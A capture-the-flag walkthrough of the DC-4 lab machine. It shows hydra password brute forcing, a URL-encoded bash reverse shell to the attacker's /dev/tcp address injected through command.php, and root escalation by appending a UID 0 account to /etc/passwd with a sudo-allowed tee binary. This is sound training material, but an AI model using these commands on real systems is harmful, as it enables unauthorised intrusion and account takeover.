Proving Grounds - DC-4
Introduction
This is a Proving Grounds room which can be found at: DC-4
A double edged sword
Reconnaissance & Scanning
Perform nmap
scan to identify open ports and services.
- Command:
nmap -p- -T4 -v 192.168.142.195
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
geobour98@kali:~$ nmap -p- -T4 -v 192.168.142.195
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-28 19:48 EEST
Initiating Ping Scan at 19:48
Scanning 192.168.142.195 [2 ports]
Completed Ping Scan at 19:48, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:48
Completed Parallel DNS resolution of 1 host. at 19:48, 0.00s elapsed
Initiating Connect Scan at 19:48
Scanning 192.168.142.195 (192.168.142.195) [65535 ports]
Discovered open port 22/tcp on 192.168.142.195
Discovered open port 80/tcp on 192.168.142.195
Completed Connect Scan at 19:49, 18.93s elapsed (65535 total ports)
Nmap scan report for 192.168.142.195 (192.168.142.195)
Host is up (0.053s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.03 seconds
Perform aggressive nmap
scan to enable OS detection, default scripts and version detection on the found ports.
- Command:
sudo nmap -A -sC -p 22,80 -v 192.168.142.195
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
geobour98@kali:~$ sudo nmap -A -sC -p 22,80 -v 192.168.142.195
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-28 19:50 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating Ping Scan at 19:50
Scanning 192.168.142.195 [4 ports]
Completed Ping Scan at 19:50, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:50
Completed Parallel DNS resolution of 1 host. at 19:50, 0.00s elapsed
Initiating SYN Stealth Scan at 19:50
Scanning 192.168.142.195 (192.168.142.195) [2 ports]
Discovered open port 22/tcp on 192.168.142.195
Discovered open port 80/tcp on 192.168.142.195
Completed SYN Stealth Scan at 19:50, 0.09s elapsed (2 total ports)
Initiating Service scan at 19:50
Scanning 2 services on 192.168.142.195 (192.168.142.195)
Completed Service scan at 19:50, 6.15s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.142.195 (192.168.142.195)
Retrying OS detection (try #2) against 192.168.142.195 (192.168.142.195)
Initiating Traceroute at 19:50
Completed Traceroute at 19:50, 0.07s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:50
Completed Parallel DNS resolution of 1 host. at 19:50, 0.00s elapsed
NSE: Script scanning 192.168.142.195.
Initiating NSE at 19:50
Completed NSE at 19:50, 1.75s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.22s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Nmap scan report for 192.168.142.195 (192.168.142.195)
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: System Tools
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.13 (91%), Linux 3.10 - 3.16 (91%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 198.841 days (since Sun Mar 13 22:39:35 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 69.20 ms 192.168.49.1 (192.168.49.1)
2 69.37 ms 192.168.142.195 (192.168.142.195)
NSE: Script Post-scanning.
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.79 seconds
Raw packets sent: 78 (5.316KB) | Rcvd: 36 (2.896KB)
Brute force the website for directories and files with the extension .php
using gobuster
.
- Command:
gobuster dir -u http://192.168.142.195/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
geobour98@kali:~$ gobuster dir -u http://192.168.142.195/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.142.195/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/09/28 19:53:20 Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 302) [Size: 206] [--> index.php]
/images (Status: 301) [Size: 170] [--> http://192.168.142.195/images/]
/index.php (Status: 200) [Size: 506]
/css (Status: 301) [Size: 170] [--> http://192.168.142.195/css/]
/logout.php (Status: 302) [Size: 163] [--> index.php]
/command.php (Status: 302) [Size: 704] [--> index.php]
===============================================================
2022/09/28 20:01:23 Finished
===============================================================
Exploitation
The most interesting file is command.php
but leads to index.php
, so maybe we have to be authenticated in order to view it.
Now we brute force
the admin
user using hydra
and if the success message contains the word command
, then we have successfully brute forced the password.
- Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.142.195 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"
1
2
3
4
5
6
7
8
9
geobour98@kali:~$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.142.195 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-28 19:54:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.142.195:80/login.php:username=^USER^&password=^PASS^:S=command
[80][http-post-form] host: 192.168.142.195 login: admin password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-28 19:55:10
Now we can login with username admin
and the found password, and navigate to /command.php
.
Here we can execute some commands from the UI, but if we Intercept
a request with Burp Suite, we see it is a POST request with a parameter radio
, which executes linux
commands. So we can put there a bash reverse shell like the following: bash -c 'exec bash -i &>/dev/tcp/192.168.49.117/443 <&1'
, but we have to URL-encode it first. The request in Burp Suite should look like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /command.php HTTP/1.1
Host: 192.168.142.195
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://192.168.142.195
Connection: close
Referer: http://192.168.142.195/command.php
Cookie: PHPSESSID=h8dn71jf3jkrrdgnd7u0a525f6
Upgrade-Insecure-Requests: 1
radio=bash+-c+'exec+bash+-i+%26>/dev/tcp/192.168.49.142/443+<%261'&submit=Run
Open a netcat listener and we get a reverse shell as www-data
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
listening on [any] 443 ...
connect to [192.168.49.142] from (UNKNOWN) [192.168.142.195] 53996
bash: cannot set terminal process group (541): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-4:/usr/share/nginx/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ ^Z
zsh: suspended nc -lvnp 443
geobour98@kali:~$ stty raw -echo;fg
[1] + continued nc -lvnp 443
www-data@dc-4:/usr/share/nginx/html$ export TERM=xterm-256color
www-data@dc-4:/usr/share/nginx/html$ stty rows 38 cols 111
www-data@dc-4:/usr/share/nginx/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Navigate to /home/jim
and we see local.txt
. Also, we see an interesting folder backups
, which contains the file old-passwords.bak
.
1
2
3
4
5
www-data@dc-4:/home/jim$ cat local.txt
[REDACTED]
www-data@dc-4:/home/jim$ cd backups
www-data@dc-4:/home/jim/backups$ ls
old-passwords.bak
Then, transfer old-passwords.bak
to the attacker machine and brute force
the user jim
with the found wordlist. We will use hydra
again.
- Command:
hydra -l jim -P old-passwords.bak ssh://192.168.142.195
1
2
3
4
5
6
7
8
9
10
11
12
13
geobour98@kali:~$ hydra -l jim -P old-passwords.bak ssh://192.168.142.195
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-28 20:05:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.142.195:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 109 to do in 00:01h, 13 active
[STATUS] 105.50 tries/min, 211 tries in 00:02h, 44 to do in 00:01h, 13 active
[22][ssh] host: 192.168.142.195 login: jim password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-28 20:08:10
Now we can login with SSH
as the user jim
with the found password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
geobour98@kali:~$ ssh jim@192.168.142.195
The authenticity of host '192.168.142.195 (192.168.142.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.142.195' (ED25519) to the list of known hosts.
jim@192.168.142.195's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$
Then, we run find
command to find files owned by jim
. The most interesting is /var/mail/jim
, which contains the password of user charles
. So, we switch to that user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
jim@dc-4:~$ find / -type f -user jim 2>/dev/null
[REDACTED]
/var/mail/jim
[REDACTED]
jim@dc-4:~$ cat /var/mail/jim
[REDACTED]
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anyt
hing goes wrong.
Password is: [REDACTED]
See ya,
Charles
[REDACTED]
jim@dc-4:~$ su charles
Password:
charles@dc-4:/home/jim$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)
Privilege Escalation
After executing the command: sudo -l
we see that we can execute /usr/bin/teehee
as root
. If we run strings
command on /usr/bin/teehee
we will find the help menu of that binary.
Then we can execute it with the -a
option to append a new user with both GID and UID as 0 (as root
) at /etc/passwd
.
Before running /usr/bin/teehee
we must generate a hash of a password (geobour98 in my case) with openssl
in order to put it in /etc/passwd
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ strings /usr/bin/teehee
[REDACTED]
Try '%s --help' for more information.
Usage: %s [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
[REDACTED]
charles@dc-4:~$ openssl passwd geobour98
Warning: truncating password to 8 characters
GWIOrZOActC.A
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd
geobour98:GWIOrZOActC.A:0:0:::/bin/bash
geobour98:GWIOrZOActC.A:0:0:::/bin/bash
^C
charles@dc-4:~$ cat /etc/passwd
[REDACTED]
geobour98:GWIOrZOActC.A:0:0:::/bin/bash
[REDACTED]
charles@dc-4:~$ su geobour98
Password:
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# cat /root/proof.txt
[REDACTED]